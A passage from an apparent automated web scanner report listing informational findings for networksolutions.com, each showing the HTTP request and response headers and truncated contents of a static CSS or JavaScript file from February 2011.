Location: http://www.business-software.com/top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Feb 2011 23:17:33 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block


7.540. http://www.networksolutions.com/css/gzip_1117039583/bundles/template.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /css/gzip_1117039583/bundles/template.css

Request

GET /css/gzip_1117039583/bundles/template.css HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; JROUTE=qevx; vrsnsf=7f54a2c886d230536bf4e8264959; landing=P13C8S570N0B9A1D661E0000V104; vertigo=false; currency=USD

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:31:02 GMT
Cache-Control: private,max-age=3600
Content-type: text/css;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
Expires: Sat, 27 Feb 2021 16:31:02 GMT
Date: Sun, 27 Feb 2011 16:31:02 GMT
Set-cookie: currency=USD; Expires=Tue, 05-Jan-2021 16:31:02 GMT; Path=/
Set-cookie: vertigo=false; Expires=Mon, 27-Feb-2012 16:31:02 GMT; Path=/
Content-Length: 66053

#wrapper .container .box{float:left;position:relative;margin:10px;background:#FFF;z-index:1;}#wrapper .container .box.cap{margin-right:0;}#wrapper .container .box.transparent{background:transparent no
...[SNIP]...

7.541. http://www.networksolutions.com/css/gzip_1497930774/bundles/domain-index.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /css/gzip_1497930774/bundles/domain-index.css

Request

GET /css/gzip_1497930774/bundles/domain-index.css HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; JROUTE=qevx; vrsnsf=7f54a2c886d230536bf4e8264959; landing=P13C8S570N0B9A1D661E0000V104; currency=USD; vertigo=false

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:31:04 GMT
Cache-Control: private,max-age=3600
Content-type: text/css;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
Expires: Sat, 27 Feb 2021 16:31:04 GMT
Date: Sun, 27 Feb 2011 16:31:03 GMT
Set-cookie: currency=USD; Expires=Tue, 05-Jan-2021 16:31:04 GMT; Path=/
Set-cookie: vertigo=false; Expires=Mon, 27-Feb-2012 16:31:04 GMT; Path=/
Content-Length: 4216

#wrapper .container .product{background:#FFF url('/img/backgrounds/domain/dom-main-bg.gif') repeat-x scroll 0 0;}#wrapper .container .tagline-container{padding:30px 20px;clear:both;float:left;margin:0
...[SNIP]...

7.542. http://www.networksolutions.com/css/gzip_1721580421/css/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /css/gzip_1721580421/css/print.css

Request

GET /css/gzip_1721580421/css/print.css HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; JROUTE=qevx; vrsnsf=7f54a2c886d230536bf4e8264959; landing=P13C8S570N0B9A1D661E0000V104

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:30:58 GMT
Cache-Control: private,max-age=3600
Content-type: text/css;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
Expires: Sat, 27 Feb 2021 16:30:59 GMT
Date: Sun, 27 Feb 2011 16:30:58 GMT
Set-cookie: currency=USD; Expires=Tue, 05-Jan-2021 16:30:59 GMT; Path=/
Set-cookie: vertigo=false; Expires=Mon, 27-Feb-2012 16:30:59 GMT; Path=/
Content-Length: 51

#wrapper #masthead, #wrapper #footer{display:none;}

7.543. http://www.networksolutions.com/css/gzip_792199742/css/lib/plugins/jquery/thickbox.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /css/gzip_792199742/css/lib/plugins/jquery/thickbox.css

Request

GET /css/gzip_792199742/css/lib/plugins/jquery/thickbox.css HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; JROUTE=qevx; vrsnsf=7f54a2c886d230536bf4e8264959; landing=P13C8S570N0B9A1D661E0000V104; currency=USD; vertigo=false

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:31:04 GMT
Cache-Control: private,max-age=3600
Content-type: text/css;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
Expires: Sat, 27 Feb 2021 16:31:04 GMT
Date: Sun, 27 Feb 2011 16:31:03 GMT
Set-cookie: currency=USD; Expires=Tue, 05-Jan-2021 16:31:04 GMT; Path=/
Set-cookie: vertigo=false; Expires=Mon, 27-Feb-2012 16:31:04 GMT; Path=/
Content-Length: 2921

*{padding:0;margin:0;}#TB_overlay{position:fixed;z-index:100;top:0px;left:0px;height:100%;width:100%;}* html #TB_overlay{position:absolute;height:expression(document.body.scrollHeight > document.body.
...[SNIP]...

7.544. http://www.networksolutions.com/css/gzip_N1611004770/bundles/ns0.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /css/gzip_N1611004770/bundles/ns0.css

Request

GET /css/gzip_N1611004770/bundles/ns0.css HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; JROUTE=qevx; vrsnsf=7f54a2c886d230536bf4e8264959; landing=P13C8S570N0B9A1D661E0000V104

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:30:58 GMT
Cache-Control: private,max-age=3600
Content-type: text/css;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
Expires: Sat, 27 Feb 2021 16:30:59 GMT
Date: Sun, 27 Feb 2011 16:30:58 GMT
Set-cookie: currency=USD; Expires=Tue, 05-Jan-2021 16:30:59 GMT; Path=/
Set-cookie: vertigo=false; Expires=Mon, 27-Feb-2012 16:30:59 GMT; Path=/
Content-Length: 23137

*{margin:0;padding:0;}body{font-family:trebuchet ms, arial, verdana, sans-serif;color:#333;text-align:center;background:#EEE;}#wrapper{clear:both;margin:0 auto;width:960px;text-align:left;}#wrapper .c
...[SNIP]...

7.545. http://www.networksolutions.com/css/gzip_N935989521/bundles/domain-search-results-default.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /css/gzip_N935989521/bundles/domain-search-results-default.css

Request

GET /css/gzip_N935989521/bundles/domain-search-results-default.css HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/domain-name-search-results.jsp?isExplicitSearchAvailable=true
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; JROUTE=qevx; vrsnsf=7f54a2c886d230536bf4e8264959; landing=P13C8S570N0B9A1D661E0000V104; vertigo=false; s_cc=true; __utmz=82970249.1298824276.1.1.utmgclid=CLqQ3K_hqKcCFc9w5QodUFfOCg|utmccn=(not%20set)|utmcmd=(not%20set); __utmv=; __utma=82970249.1334409241.1298824276.1298824276.1298824276.1; __utmc=82970249; __utmb=82970249.1.10.1298824276; s_sq=netsolglobal%3D%2526pid%253Dnet%25257C%252520domain-name-registration%25253ERV8.jsp%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.networksolutions.com%25252Fassets%25252Flp-img%25252Frv-ab-699%25252Frv-btn-get-it-now.png%2526ot%253DIMAGE; currency=USD

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:35:22 GMT
Cache-Control: private,max-age=3600
Content-type: text/css;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
Expires: Sat, 27 Feb 2021 16:35:22 GMT
Date: Sun, 27 Feb 2011 16:35:22 GMT
Set-cookie: currency=USD; Expires=Tue, 05-Jan-2021 16:35:22 GMT; Path=/
Set-cookie: vertigo=false; Expires=Mon, 27-Feb-2012 16:35:22 GMT; Path=/
Content-Length: 1103

#wrapper .container .tagline-container{padding:10px 20px 15px;}#wrapper .container .tagline-container .tagline h1{font-weight:normal;font-size:22px;color:#84A23B;}#wrapper .container .tagline-containe
...[SNIP]...

7.546. http://www.networksolutions.com/js/gzip_1519484056/js/utils/LivePerson-mtagconfig.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /js/gzip_1519484056/js/utils/LivePerson-mtagconfig.js

Request

GET /js/gzip_1519484056/js/utils/LivePerson-mtagconfig.js HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; JROUTE=qevx; vrsnsf=7f54a2c886d230536bf4e8264959; landing=P13C8S570N0B9A1D661E0000V104

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:30:58 GMT
Cache-Control: private,max-age=3600
Content-type: text/javascript;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
Expires: Sat, 27 Feb 2021 16:30:58 GMT
Date: Sun, 27 Feb 2011 16:30:58 GMT
Set-cookie: currency=USD; Expires=Tue, 05-Jan-2021 16:30:58 GMT; Path=/
Set-cookie: vertigo=false; Expires=Mon, 27-Feb-2012 16:30:58 GMT; Path=/
Content-Length: 3714


var lpMTagConfig={'lpServer':'server.iad.liveperson.net','lpNumber':'43040610','lpProtocol':(document.location.toString().indexOf('https:')==0)?'https':'http','lpTagLoaded':false,'lpTagSrv':'server.i
...[SNIP]...

7.547. http://www.networksolutions.com/js/gzip_1706295218/bundles/omniture.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /js/gzip_1706295218/bundles/omniture.js

Request

GET /js/gzip_1706295218/bundles/omniture.js HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; JROUTE=qevx; vrsnsf=7f54a2c886d230536bf4e8264959; landing=P13C8S570N0B9A1D661E0000V104; currency=USD; vertigo=false

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:31:04 GMT
Cache-Control: private,max-age=3600
Content-type: text/javascript;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
Expires: Sat, 27 Feb 2021 16:31:04 GMT
Date: Sun, 27 Feb 2011 16:31:03 GMT
Set-cookie: currency=USD; Expires=Tue, 05-Jan-2021 16:31:04 GMT; Path=/
Set-cookie: vertigo=false; Expires=Mon, 27-Feb-2012 16:31:04 GMT; Path=/
Content-Length: 41610


if(typeof(s_account)=="undefined"){var fld=document.getElementById('omnitureInfo');if(fld==null){alert("Could not locate Omniture Info");}
var regex=/s_account=\'([a-zA-Z0-9\-\+]+)\'\[\|\]/;var found
...[SNIP]...

7.548. http://www.networksolutions.com/js/gzip_N1134831222/js/lib/jquery/plugins/thickbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /js/gzip_N1134831222/js/lib/jquery/plugins/thickbox.js

Request

GET /js/gzip_N1134831222/js/lib/jquery/plugins/thickbox.js HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; JROUTE=qevx; vrsnsf=7f54a2c886d230536bf4e8264959; landing=P13C8S570N0B9A1D661E0000V104; currency=USD; vertigo=false

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:31:04 GMT
Cache-Control: private,max-age=3600
Content-type: text/javascript;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
Expires: Sat, 27 Feb 2021 16:31:04 GMT
Date: Sun, 27 Feb 2011 16:31:03 GMT
Set-cookie: currency=USD; Expires=Tue, 05-Jan-2021 16:31:04 GMT; Path=/
Set-cookie: vertigo=false; Expires=Mon, 27-Feb-2012 16:31:04 GMT; Path=/
Content-Length: 8407


var tb_pathToImage="/img/plugins/thickbox/loadingAnimation.gif";$(document).ready(function(){tb_init('a.thickbox, area.thickbox, input.thickbox');imgLoader=new Image();imgLoader.src=tb_pathToImage;})
...[SNIP]...

7.549. http://www.networksolutions.com/js/gzip_N1436114336/bundles/seoforecom.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /js/gzip_N1436114336/bundles/seoforecom.js

Request

GET /js/gzip_N1436114336/bundles/seoforecom.js HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/domain-name-search-results.jsp?isExplicitSearchAvailable=true
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; JROUTE=qevx; vrsnsf=7f54a2c886d230536bf4e8264959; landing=P13C8S570N0B9A1D661E0000V104; s_cc=true; __utmz=82970249.1298824276.1.1.utmgclid=CLqQ3K_hqKcCFc9w5QodUFfOCg|utmccn=(not%20set)|utmcmd=(not%20set); __utmv=; __utma=82970249.1334409241.1298824276.1298824276.1298824276.1; __utmc=82970249; __utmb=82970249.1.10.1298824276; s_sq=netsolglobal%3D%2526pid%253Dnet%25257C%252520domain-name-registration%25253ERV8.jsp%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.networksolutions.com%25252Fassets%25252Flp-img%25252Frv-ab-699%25252Frv-btn-get-it-now.png%2526ot%253DIMAGE; currency=USD; vertigo=false

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:35:22 GMT
Cache-Control: private,max-age=3600
Content-type: text/javascript;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
Expires: Sat, 27 Feb 2021 16:35:22 GMT
Date: Sun, 27 Feb 2011 16:35:22 GMT
Set-cookie: currency=USD; Expires=Tue, 05-Jan-2021 16:35:22 GMT; Path=/
Set-cookie: vertigo=false; Expires=Mon, 27-Feb-2012 16:35:22 GMT; Path=/
Content-Length: 2554


(function($){$.fn.extend({tabify:function(){function getHref(el){hash=$(el).find('a').attr('href');if(hash)
return hash.substring(0,hash.length-4);else
return false;}
function setActive(el){$(el).add
...[SNIP]...

7.550. http://www.networksolutions.com/js/gzip_N2081288211/bundles/domain-name-search-results.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /js/gzip_N2081288211/bundles/domain-name-search-results.js

Request

GET /js/gzip_N2081288211/bundles/domain-name-search-results.js HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/domain-name-search-results.jsp?isExplicitSearchAvailable=true
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; JROUTE=qevx; vrsnsf=7f54a2c886d230536bf4e8264959; landing=P13C8S570N0B9A1D661E0000V104; vertigo=false; s_cc=true; __utmz=82970249.1298824276.1.1.utmgclid=CLqQ3K_hqKcCFc9w5QodUFfOCg|utmccn=(not%20set)|utmcmd=(not%20set); __utmv=; __utma=82970249.1334409241.1298824276.1298824276.1298824276.1; __utmc=82970249; __utmb=82970249.1.10.1298824276; s_sq=netsolglobal%3D%2526pid%253Dnet%25257C%252520domain-name-registration%25253ERV8.jsp%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.networksolutions.com%25252Fassets%25252Flp-img%25252Frv-ab-699%25252Frv-btn-get-it-now.png%2526ot%253DIMAGE; currency=USD

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:35:22 GMT
Cache-Control: private,max-age=3600
Content-type: text/javascript;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
Expires: Sat, 27 Feb 2021 16:35:22 GMT
Date: Sun, 27 Feb 2011 16:35:22 GMT
Set-cookie: currency=USD; Expires=Tue, 05-Jan-2021 16:35:22 GMT; Path=/
Set-cookie: vertigo=false; Expires=Mon, 27-Feb-2012 16:35:22 GMT; Path=/
Content-Length: 10428


JSONstring={compactOutput:false,includeProtos:false,includeFunctions:false,detectCirculars:true,restoreCirculars:true,make:function(arg,restore){this.restore=restore;this.mem=[];this.pathMem=[];retur
...[SNIP]...

7.551. http://www.networksolutions.com/js/gzip_N766518311/bundles/domain-main.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /js/gzip_N766518311/bundles/domain-main.js

Request

GET /js/gzip_N766518311/bundles/domain-main.js HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; JROUTE=qevx; vrsnsf=7f54a2c886d230536bf4e8264959; landing=P13C8S570N0B9A1D661E0000V104; currency=USD; vertigo=false

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:31:04 GMT
Cache-Control: private,max-age=3600
Content-type: text/javascript;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
Expires: Sat, 27 Feb 2021 16:31:04 GMT
Date: Sun, 27 Feb 2011 16:31:03 GMT
Set-cookie: currency=USD; Expires=Tue, 05-Jan-2021 16:31:04 GMT; Path=/
Set-cookie: vertigo=false; Expires=Mon, 27-Feb-2012 16:31:04 GMT; Path=/
Content-Length: 12072


(function($){var height=$.fn.height,width=$.fn.width;$.fn.extend({height:function(){if(this[0]==window)
return self.innerHeight||$.boxModel&&document.documentElement.clientHeight||document.body.clien
...[SNIP]...

7.552. http://www.networksolutions.com/js/gzip_N844206633/bundles/template.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /js/gzip_N844206633/bundles/template.js

Request

GET /js/gzip_N844206633/bundles/template.js HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; JROUTE=qevx; vrsnsf=7f54a2c886d230536bf4e8264959; landing=P13C8S570N0B9A1D661E0000V104; vertigo=false; currency=USD

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:31:02 GMT
Cache-Control: private,max-age=3600
Content-type: text/javascript;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
Expires: Sat, 27 Feb 2021 16:31:02 GMT
Date: Sun, 27 Feb 2011 16:31:02 GMT
Set-cookie: currency=USD; Expires=Tue, 05-Jan-2021 16:31:02 GMT; Path=/
Set-cookie: vertigo=false; Expires=Mon, 27-Feb-2012 16:31:02 GMT; Path=/
Content-Length: 59295


(function($){$.fn.selectAllCheckboxes=function(settings){var options=$.extend({formName:null,keepCheckedByValue:null,keepCheckedByIndex:null},settings||{});return this.each(function(){var $input=$(th
...[SNIP]...

7.553. http://www.networksolutions.com/js/gzip_N85535608/bundles/ns0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /js/gzip_N85535608/bundles/ns0.js

Request

GET /js/gzip_N85535608/bundles/ns0.js HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/domain-name-search-results.jsp?isExplicitSearchAvailable=true&dontShowCountrySearchLink=true
Cache-Control: max-age=0
If-Modified-Since: Sun, 06 Nov 2005 12:00:00 GMT
Accept: */*
If-None-Match: W/2740050219
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
